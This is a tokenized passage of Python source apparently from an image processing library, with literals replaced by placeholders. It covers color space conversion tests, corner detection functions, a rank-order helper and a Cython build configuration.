lab_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> for obs in [ "<STR_LIT:2>" , "<STR_LIT>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> lab_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( lab_array_I_obs , <EOL> xyz2lab ( self . xyz_array , I , obs ) , <EOL> decimal = <NUM_LIT:2> ) <EOL> for I in [ "<STR_LIT:a>" , "<STR_LIT:e>" ] : <EOL> fname = "<STR_LIT>" . format ( I ) <EOL> lab_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( lab_array_I_obs , <EOL> xyz2lab ( self . xyz_array , I , "<STR_LIT:2>" ) , <EOL> decimal = <NUM_LIT:2> ) <EOL> def test_lab2xyz ( self ) : <EOL> assert_array_almost_equal ( lab2xyz ( self . lab_array ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> for obs in [ "<STR_LIT:2>" , "<STR_LIT>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> lab_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( lab2xyz ( lab_array_I_obs , I , obs ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT:a>" , "<STR_LIT:e>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> lab_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( lab2xyz ( lab_array_I_obs , I , "<STR_LIT:2>" ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> try : <EOL> xs = lab2xyz ( lab_array_I_obs , "<STR_LIT>" , "<STR_LIT:2>" ) <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> xs = lab2xyz ( lab_array_I_obs , "<STR_LIT>" , "<STR_LIT>" ) <EOL> except ValueError : <EOL> pass <EOL> def test_rgb2lab_brucelindbloom ( self ) : <EOL> """<STR_LIT>""" <EOL> gt_for_colbars = np . array ( [ <EOL> [ <NUM_LIT:100> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) . T <EOL> gt_array = np . swapaxes ( gt_for_colbars . reshape ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:2> ) , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( rgb2lab ( self . colbars_array ) , gt_array , decimal = <NUM_LIT:2> ) <EOL> def test_lab_rgb_roundtrip ( self ) : <EOL> img_rgb = img_as_float ( self . img_rgb ) <EOL> assert_array_almost_equal ( lab2rgb ( rgb2lab ( img_rgb ) ) , img_rgb ) <EOL> def test_xyz2luv ( self ) : <EOL> assert_array_almost_equal ( xyz2luv ( self . xyz_array ) , <EOL> self . luv_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> for obs in [ "<STR_LIT:2>" , "<STR_LIT>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> luv_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( luv_array_I_obs , <EOL> xyz2luv ( self . xyz_array , I , obs ) , <EOL> decimal = <NUM_LIT:2> ) <EOL> for I in [ "<STR_LIT:a>" , "<STR_LIT:e>" ] : <EOL> fname = "<STR_LIT>" . format ( I ) <EOL> luv_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( luv_array_I_obs , <EOL> xyz2luv ( self . xyz_array , I , "<STR_LIT:2>" ) , <EOL> decimal = <NUM_LIT:2> ) <EOL> def test_luv2xyz ( self ) : <EOL> assert_array_almost_equal ( luv2xyz ( self . luv_array ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> for obs in [ "<STR_LIT:2>" , "<STR_LIT>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> luv_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( luv2xyz ( luv_array_I_obs , I , obs ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT:a>" , "<STR_LIT:e>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> luv_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( luv2xyz ( luv_array_I_obs , I , "<STR_LIT:2>" ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> def test_rgb2luv_brucelindbloom ( self ) : <EOL> """<STR_LIT>""" <EOL> gt_for_colbars = np . array ( [ <EOL> [ <NUM_LIT:100> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) . T <EOL> gt_array = np . swapaxes ( gt_for_colbars . reshape ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:2> ) , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( rgb2luv ( self . colbars_array ) , <EOL> gt_array , decimal = <NUM_LIT:2> ) <EOL> def test_luv_rgb_roundtrip ( self ) : <EOL> img_rgb = img_as_float ( self . img_rgb ) <EOL> assert_array_almost_equal ( luv2rgb ( rgb2luv ( img_rgb ) ) , img_rgb ) <EOL> def test_lab_rgb_outlier ( self ) : <EOL> lab_array = np . ones ( ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> lab_array [ <NUM_LIT:0> ] = [ <NUM_LIT:50> , - <NUM_LIT:12> , <NUM_LIT> ] <EOL> lab_array [ <NUM_LIT:1> ] = [ <NUM_LIT:50> , <NUM_LIT:12> , - <NUM_LIT> ] <EOL> lab_array [ <NUM_LIT:2> ] = [ <NUM_LIT> , - <NUM_LIT:4> , - <NUM_LIT> ] <EOL> rgb_array = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ] ] , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1.> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.> ] ] , <EOL> ] ) <EOL> assert_almost_equal ( lab2rgb ( lab_array ) , rgb_array , decimal = <NUM_LIT:3> ) <EOL> def test_lab_full_gamut ( self ) : <EOL> a , b = np . meshgrid ( np . arange ( - <NUM_LIT:100> , <NUM_LIT:100> ) , np . arange ( - <NUM_LIT:100> , <NUM_LIT:100> ) ) <EOL> L = np . ones ( a . shape ) <EOL> lab = np . dstack ( ( L , a , b ) ) <EOL> for value in [ <NUM_LIT:0> , <NUM_LIT:10> , <NUM_LIT:20> ] : <EOL> lab [ : , : , <NUM_LIT:0> ] = value <EOL> with expected_warnings ( [ '<STR_LIT>' ] ) : <EOL> lab2xyz ( lab ) <EOL> def test_lab_lch_roundtrip ( self ) : <EOL> rgb = img_as_float ( self . img_rgb ) <EOL> lab = rgb2lab ( rgb ) <EOL> lab2 = lch2lab ( lab2lch ( lab ) ) <EOL> assert_array_almost_equal ( lab2 , lab ) <EOL> def test_rgb_lch_roundtrip ( self ) : <EOL> rgb = img_as_float ( self . img_rgb ) <EOL> lab = rgb2lab ( rgb ) <EOL> lch = lab2lch ( lab ) <EOL> lab2 = lch2lab ( lch ) <EOL> rgb2 = lab2rgb ( lab2 ) <EOL> assert_array_almost_equal ( rgb , rgb2 ) <EOL> def test_lab_lch_0d ( self ) : <EOL> lab0 = self . _get_lab0 ( ) <EOL> lch0 = lab2lch ( lab0 ) <EOL> lch2 = lab2lch ( lab0 [ None , None , : ] ) <EOL> assert_array_almost_equal ( lch0 , lch2 [ <NUM_LIT:0> , <NUM_LIT:0> , : ] ) <EOL> def test_lab_lch_1d ( self ) : <EOL> lab0 = self . _get_lab0 ( ) <EOL> lch0 = lab2lch ( lab0 ) <EOL> lch1 = lab2lch ( lab0 [ None , : ] ) <EOL> assert_array_almost_equal ( lch0 , lch1 [ <NUM_LIT:0> , : ] ) <EOL> def test_lab_lch_3d ( self ) : <EOL> lab0 = self . _get_lab0 ( ) <EOL> lch0 = lab2lch ( lab0 ) <EOL> lch3 = lab2lch ( lab0 [ None , None , None , : ] ) <EOL> assert_array_almost_equal ( lch0 , lch3 [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , : ] ) <EOL> def _get_lab0 ( self ) : <EOL> rgb = img_as_float ( self . img_rgb [ : <NUM_LIT:1> , : <NUM_LIT:1> , : ] ) <EOL> return rgb2lab ( rgb ) [ <NUM_LIT:0> , <NUM_LIT:0> , : ] <EOL> def test_gray2rgb ( ) : <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> assert_raises ( ValueError , gray2rgb , x ) <EOL> x = x . reshape ( ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> y = gray2rgb ( x ) <EOL> assert_equal ( y . shape , ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> assert_equal ( y . dtype , x . dtype ) <EOL> assert_equal ( y [ ... , <NUM_LIT:0> ] , x ) <EOL> assert_equal ( y [ <NUM_LIT:0> , <NUM_LIT:0> , : ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> x = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:255> ] ] , dtype = np . uint8 ) <EOL> z = gray2rgb ( x ) <EOL> assert_equal ( z . shape , ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> assert_equal ( z [ ... , <NUM_LIT:0> ] , x ) <EOL> assert_equal ( z [ <NUM_LIT:0> , <NUM_LIT:1> , : ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> def test_gray2rgb_rgb ( ) : <EOL> x = np . random . rand ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> ) <EOL> y = gray2rgb ( x ) <EOL> assert_equal ( x , y ) <EOL> def test_gray2rgb_alpha ( ) : <EOL> x = np . random . random ( ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = None ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = False ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = True ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> x = np . random . random ( ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = None ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = False ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = True ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> assert_equal ( gray2rgb ( np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT> ] ] ) , <EOL> alpha = True ) [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> ] , <NUM_LIT:1> ) <EOL> assert_equal ( gray2rgb ( np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] ] , dtype = np . uint8 ) , <EOL> alpha = True ) [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> ] , <NUM_LIT:255> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from numpy . testing import run_module_suite <EOL> run_module_suite ( ) </s>
<s> import numpy as np <EOL> from scipy import ndimage as ndi <EOL> from scipy import stats <EOL> from . . util import img_as_float , pad <EOL> from . . feature import peak_local_max <EOL> from . . feature . util import _prepare_grayscale_input_2D <EOL> from . . feature . corner_cy import _corner_fast <EOL> from . _hessian_det_appx import _hessian_matrix_det <EOL> from . . transform import integral_image <EOL> from . . _shared . utils import safe_as_int <EOL> def _compute_derivatives ( image , mode = '<STR_LIT>' , cval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> imy = ndi . sobel ( image , axis = <NUM_LIT:0> , mode = mode , cval = cval ) <EOL> imx = ndi . sobel ( image , axis = <NUM_LIT:1> , mode = mode , cval = cval ) <EOL> return imx , imy <EOL> def structure_tensor ( image , sigma = <NUM_LIT:1> , mode = '<STR_LIT>' , cval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> image = _prepare_grayscale_input_2D ( image ) <EOL> imx , imy = _compute_derivatives ( image , mode = mode , cval = cval ) <EOL> Axx = ndi . gaussian_filter ( imx * imx , sigma , mode = mode , cval = cval ) <EOL> Axy = ndi . gaussian_filter ( imx * imy , sigma , mode = mode , cval = cval ) <EOL> Ayy = ndi . gaussian_filter ( imy * imy , sigma , mode = mode , cval = cval ) <EOL> return Axx , Axy , Ayy <EOL> def hessian_matrix ( image , sigma = <NUM_LIT:1> , mode = '<STR_LIT>' , cval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> image = _prepare_grayscale_input_2D ( image ) <EOL> window_ext = max ( <NUM_LIT:1> , np . ceil ( <NUM_LIT:3> * sigma ) ) <EOL> ky , kx = np . mgrid [ - window_ext : window_ext + <NUM_LIT:1> , - window_ext : window_ext + <NUM_LIT:1> ] <EOL> gaussian_exp = np . exp ( - ( kx ** <NUM_LIT:2> + ky ** <NUM_LIT:2> ) / ( <NUM_LIT:2> * sigma ** <NUM_LIT:2> ) ) <EOL> kernel_xx = <NUM_LIT:1> / ( <NUM_LIT:2> * np . pi * sigma ** <NUM_LIT:4> ) * ( kx ** <NUM_LIT:2> / sigma ** <NUM_LIT:2> - <NUM_LIT:1> ) <EOL> kernel_xx *= gaussian_exp <EOL> kernel_xy = <NUM_LIT:1> / ( <NUM_LIT:2> * np . pi * sigma ** <NUM_LIT:6> ) * ( kx * ky ) <EOL> kernel_xy *= gaussian_exp <EOL> kernel_yy = kernel_xx . transpose ( ) <EOL> eps = np . finfo ( kernel_xx . dtype ) . eps <EOL> kernel_xx [ np . abs ( kernel_xx ) < eps * np . abs ( kernel_xx ) . max ( ) ] = <NUM_LIT:0> <EOL> kernel_xy [ np . abs ( kernel_xy ) < eps * np . abs ( kernel_xy ) . max ( ) ] = <NUM_LIT:0> <EOL> kernel_yy [ np . abs ( kernel_yy ) < eps * np . abs ( kernel_yy ) . max ( ) ] = <NUM_LIT:0> <EOL> Hxx = ndi . convolve ( image , kernel_xx , mode = mode , cval = cval ) <EOL> Hxy = ndi . convolve ( image , kernel_xy , mode = mode , cval = cval ) <EOL> Hyy = ndi . convolve ( image , kernel_yy , mode = mode , cval = cval ) <EOL> return Hxx , Hxy , Hyy <EOL> def hessian_matrix_det ( image , sigma ) : <EOL> """<STR_LIT>""" <EOL> image = img_as_float ( image ) <EOL> image = integral_image ( image ) <EOL> return np . array ( _hessian_matrix_det ( image , sigma ) ) <EOL> def _image_orthogonal_matrix22_eigvals ( M00 , M01 , M11 ) : <EOL> l1 = ( M00 + M11 ) / <NUM_LIT:2> + np . sqrt ( <NUM_LIT:4> * M01 ** <NUM_LIT:2> + ( M00 - M11 ) ** <NUM_LIT:2> ) / <NUM_LIT:2> <EOL> l2 = ( M00 + M11 ) / <NUM_LIT:2> - np . sqrt ( <NUM_LIT:4> * M01 ** <NUM_LIT:2> + ( M00 - M11 ) ** <NUM_LIT:2> ) / <NUM_LIT:2> <EOL> return l1 , l2 <EOL> def structure_tensor_eigvals ( Axx , Axy , Ayy ) : <EOL> """<STR_LIT>""" <EOL> return _image_orthogonal_matrix22_eigvals ( Axx , Axy , Ayy ) <EOL> def hessian_matrix_eigvals ( Hxx , Hxy , Hyy ) : <EOL> """<STR_LIT>""" <EOL> return _image_orthogonal_matrix22_eigvals ( Hxx , Hxy , Hyy ) <EOL> def corner_kitchen_rosenfeld ( image , mode = '<STR_LIT>' , cval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> imx , imy = _compute_derivatives ( image , mode = mode , cval = cval ) <EOL> imxx , imxy = _compute_derivatives ( imx , mode = mode , cval = cval ) <EOL> imyx , imyy = _compute_derivatives ( imy , mode = mode , cval = cval ) <EOL> numerator = ( imxx * imy ** <NUM_LIT:2> + imyy * imx ** <NUM_LIT:2> - <NUM_LIT:2> * imxy * imx * imy ) <EOL> denominator = ( imx ** <NUM_LIT:2> + imy ** <NUM_LIT:2> ) <EOL> response = np . zeros_like ( image , dtype = np . double ) <EOL> mask = denominator != <NUM_LIT:0> <EOL> response [ mask ] = numerator [ mask ] / denominator [ mask ] <EOL> return response <EOL> def corner_harris ( image , method = '<STR_LIT:k>' , k = <NUM_LIT> , eps = <NUM_LIT> , sigma = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> Axx , Axy , Ayy = structure_tensor ( image , sigma ) <EOL> detA = Axx * Ayy - Axy ** <NUM_LIT:2> <EOL> traceA = Axx + Ayy <EOL> if method == '<STR_LIT:k>' : <EOL> response = detA - k * traceA ** <NUM_LIT:2> <EOL> else : <EOL> response = <NUM_LIT:2> * detA / ( traceA + eps ) <EOL> return response <EOL> def corner_shi_tomasi ( image , sigma = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> Axx , Axy , Ayy = structure_tensor ( image , sigma ) <EOL> response = ( ( Axx + Ayy ) - np . sqrt ( ( Axx - Ayy ) ** <NUM_LIT:2> + <NUM_LIT:4> * Axy ** <NUM_LIT:2> ) ) / <NUM_LIT:2> <EOL> return response <EOL> def corner_foerstner ( image , sigma = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> Axx , Axy , Ayy = structure_tensor ( image , sigma ) <EOL> detA = Axx * Ayy - Axy ** <NUM_LIT:2> <EOL> traceA = Axx + Ayy <EOL> w = np . zeros_like ( image , dtype = np . double ) <EOL> q = np . zeros_like ( image , dtype = np . double ) <EOL> mask = traceA != <NUM_LIT:0> <EOL> w [ mask ] = detA [ mask ] / traceA [ mask ] <EOL> q [ mask ] = <NUM_LIT:4> * detA [ mask ] / traceA [ mask ] ** <NUM_LIT:2> <EOL> return w , q <EOL> def corner_fast ( image , n = <NUM_LIT:12> , threshold = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> image = _prepare_grayscale_input_2D ( image ) <EOL> image = np . ascontiguousarray ( image ) <EOL> response = _corner_fast ( image , n , threshold ) <EOL> return response <EOL> def corner_subpix ( image , corners , window_size = <NUM_LIT:11> , alpha = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> wext = ( window_size - <NUM_LIT:1> ) // <NUM_LIT:2> <EOL> image = pad ( image , pad_width = wext , mode = '<STR_LIT>' , constant_values = <NUM_LIT:0> ) <EOL> corners = safe_as_int ( corners + wext ) <EOL> N_dot = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:2> ) , dtype = np . double ) <EOL> N_edge = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:2> ) , dtype = np . double ) <EOL> b_dot = np . zeros ( ( <NUM_LIT:2> , ) , dtype = np . double ) <EOL> b_edge = np . zeros ( ( <NUM_LIT:2> , ) , dtype = np . double ) <EOL> redundancy = window_size ** <NUM_LIT:2> - <NUM_LIT:2> <EOL> t_crit_dot = stats . f . isf ( <NUM_LIT:1> - alpha , redundancy , redundancy ) <EOL> t_crit_edge = stats . f . isf ( alpha , redundancy , redundancy ) <EOL> y , x = np . mgrid [ - wext : wext + <NUM_LIT:1> , - wext : wext + <NUM_LIT:1> ] <EOL> corners_subpix = np . zeros_like ( corners , dtype = np . double ) <EOL> for i , ( y0 , x0 ) in enumerate ( corners ) : <EOL> miny = y0 - wext - <NUM_LIT:1> <EOL> maxy = y0 + wext + <NUM_LIT:2> <EOL> minx = x0 - wext - <NUM_LIT:1> <EOL> maxx = x0 + wext + <NUM_LIT:2> <EOL> window = image [ miny : maxy , minx : maxx ] <EOL> winx , winy = _compute_derivatives ( window , mode = '<STR_LIT>' , cval = <NUM_LIT:0> ) <EOL> winx_winx = ( winx * winx ) [ <NUM_LIT:1> : - <NUM_LIT:1> , <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> winx_winy = ( winx * winy ) [ <NUM_LIT:1> : - <NUM_LIT:1> , <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> winy_winy = ( winy * winy ) [ <NUM_LIT:1> : - <NUM_LIT:1> , <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> Axx = np . sum ( winx_winx ) <EOL> Axy = np . sum ( winx_winy ) <EOL> Ayy = np . sum ( winy_winy ) <EOL> bxx_x = np . sum ( winx_winx * x ) <EOL> bxx_y = np . sum ( winx_winx * y ) <EOL> bxy_x = np . sum ( winx_winy * x ) <EOL> bxy_y = np . sum ( winx_winy * y ) <EOL> byy_x = np . sum ( winy_winy * x ) <EOL> byy_y = np . sum ( winy_winy * y ) <EOL> N_dot [ <NUM_LIT:0> , <NUM_LIT:0> ] = Axx <EOL> N_dot [ <NUM_LIT:0> , <NUM_LIT:1> ] = N_dot [ <NUM_LIT:1> , <NUM_LIT:0> ] = - Axy <EOL> N_dot [ <NUM_LIT:1> , <NUM_LIT:1> ] = Ayy <EOL> N_edge [ <NUM_LIT:0> , <NUM_LIT:0> ] = Ayy <EOL> N_edge [ <NUM_LIT:0> , <NUM_LIT:1> ] = N_edge [ <NUM_LIT:1> , <NUM_LIT:0> ] = Axy <EOL> N_edge [ <NUM_LIT:1> , <NUM_LIT:1> ] = Axx <EOL> b_dot [ : ] = bxx_y - bxy_x , byy_x - bxy_y <EOL> b_edge [ : ] = byy_y + bxy_x , bxx_x + bxy_y <EOL> try : <EOL> est_dot = np . linalg . solve ( N_dot , b_dot ) <EOL> est_edge = np . linalg . solve ( N_edge , b_edge ) <EOL> except np . linalg . LinAlgError : <EOL> corners_subpix [ i , : ] = np . nan , np . nan <EOL> continue <EOL> ry_dot = y - est_dot [ <NUM_LIT:0> ] <EOL> rx_dot = x - est_dot [ <NUM_LIT:1> ] <EOL> ry_edge = y - est_edge [ <NUM_LIT:0> ] <EOL> rx_edge = x - est_edge [ <NUM_LIT:1> ] <EOL> rxx_dot = rx_dot * rx_dot <EOL> rxy_dot = rx_dot * ry_dot <EOL> ryy_dot = ry_dot * ry_dot <EOL> rxx_edge = rx_edge * rx_edge <EOL> rxy_edge = rx_edge * ry_edge <EOL> ryy_edge = ry_edge * ry_edge <EOL> var_dot = np . sum ( winx_winx * ryy_dot - <NUM_LIT:2> * winx_winy * rxy_dot <EOL> + winy_winy * rxx_dot ) <EOL> var_edge = np . sum ( winy_winy * ryy_edge + <NUM_LIT:2> * winx_winy * rxy_edge <EOL> + winx_winx * rxx_edge ) <EOL> if var_dot < np . spacing ( <NUM_LIT:1> ) and var_edge < np . spacing ( <NUM_LIT:1> ) : <EOL> t = np . nan <EOL> elif var_dot == <NUM_LIT:0> : <EOL> t = np . inf <EOL> else : <EOL> t = var_edge / var_dot <EOL> corner_class = int ( t < t_crit_edge ) - int ( t > t_crit_dot ) <EOL> if corner_class == - <NUM_LIT:1> : <EOL> corners_subpix [ i , : ] = y0 + est_dot [ <NUM_LIT:0> ] , x0 + est_dot [ <NUM_LIT:1> ] <EOL> elif corner_class == <NUM_LIT:0> : <EOL> corners_subpix [ i , : ] = np . nan , np . nan <EOL> elif corner_class == <NUM_LIT:1> : <EOL> corners_subpix [ i , : ] = y0 + est_edge [ <NUM_LIT:0> ] , x0 + est_edge [ <NUM_LIT:1> ] <EOL> corners_subpix -= wext <EOL> return corners_subpix <EOL> def corner_peaks ( image , min_distance = <NUM_LIT:1> , threshold_abs = None , threshold_rel = <NUM_LIT:0.1> , <EOL> exclude_border = True , indices = True , num_peaks = np . inf , <EOL> footprint = None , labels = None ) : <EOL> """<STR_LIT>""" <EOL> peaks = peak_local_max ( image , min_distance = min_distance , <EOL> threshold_abs = threshold_abs , <EOL> threshold_rel = threshold_rel , <EOL> exclude_border = exclude_border , <EOL> indices = False , num_peaks = num_peaks , <EOL> footprint = footprint , labels = labels ) <EOL> if min_distance > <NUM_LIT:0> : <EOL> coords = np . transpose ( peaks . nonzero ( ) ) <EOL> for r , c in coords : <EOL> if peaks [ r , c ] : <EOL> peaks [ r - min_distance : r + min_distance + <NUM_LIT:1> , <EOL> c - min_distance : c + min_distance + <NUM_LIT:1> ] = False <EOL> peaks [ r , c ] = True <EOL> if indices is True : <EOL> return np . transpose ( peaks . nonzero ( ) ) <EOL> else : <EOL> return peaks </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> def rank_order ( image ) : <EOL> """<STR_LIT>""" <EOL> flat_image = image . ravel ( ) <EOL> sort_order = flat_image . argsort ( ) . astype ( np . uint32 ) <EOL> flat_image = flat_image [ sort_order ] <EOL> sort_rank = np . zeros_like ( sort_order ) <EOL> is_different = flat_image [ : - <NUM_LIT:1> ] != flat_image [ <NUM_LIT:1> : ] <EOL> np . cumsum ( is_different , out = sort_rank [ <NUM_LIT:1> : ] ) <EOL> original_values = np . zeros ( ( sort_rank [ - <NUM_LIT:1> ] + <NUM_LIT:1> , ) , image . dtype ) <EOL> original_values [ <NUM_LIT:0> ] = flat_image [ <NUM_LIT:0> ] <EOL> original_values [ <NUM_LIT:1> : ] = flat_image [ <NUM_LIT:1> : ] [ is_different ] <EOL> int_image = np . zeros_like ( sort_order ) <EOL> int_image [ sort_order ] = sort_rank <EOL> return ( int_image . reshape ( image . shape ) , original_values ) </s>
<s> from skimage . _build import cython <EOL> import os . path <EOL> base_path = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> def configuration ( parent_package = '<STR_LIT>' , top_path = None ) : <EOL> from numpy . distutils . misc_util import Configuration , get_numpy_include_dirs <EOL> config = Configuration ( '<STR_LIT>' , parent_package , top_path ) <EOL> config . add_data_dir ( '<STR_LIT>' ) <EOL> cython ( [ '<STR_LIT>' ] , working_path = base_path ) <EOL> cython ( [ '<STR_LIT>' ] , working_path = base_path ) <EOL> cython ( [ '<STR_LIT>' ] , working_path = base_path ) <EOL> config . add_extension ( '<STR_LIT>' , sources = [ '<STR_LIT>' ] , <EOL> include_dirs = [ get_numpy_include_dirs ( ) ] ) <EOL> config . add_extension ( '<STR_LIT>' , sources = [ '<STR_LIT>' ] , <EOL> include_dirs = [ get_numpy_include_dirs ( ) ] ) <EOL> config . add_extension ( '<STR_LIT>' , sources = [ '<STR_LIT>' ] , <EOL> include_dirs = [ get_numpy_include_dirs ( ) ] ) <EOL> return config <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from numpy . distutils . core import setup <EOL> setup ( maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> ** ( configuration ( top_path = '<STR_LIT>' ) . todict ( ) ) <EOL> ) </s>
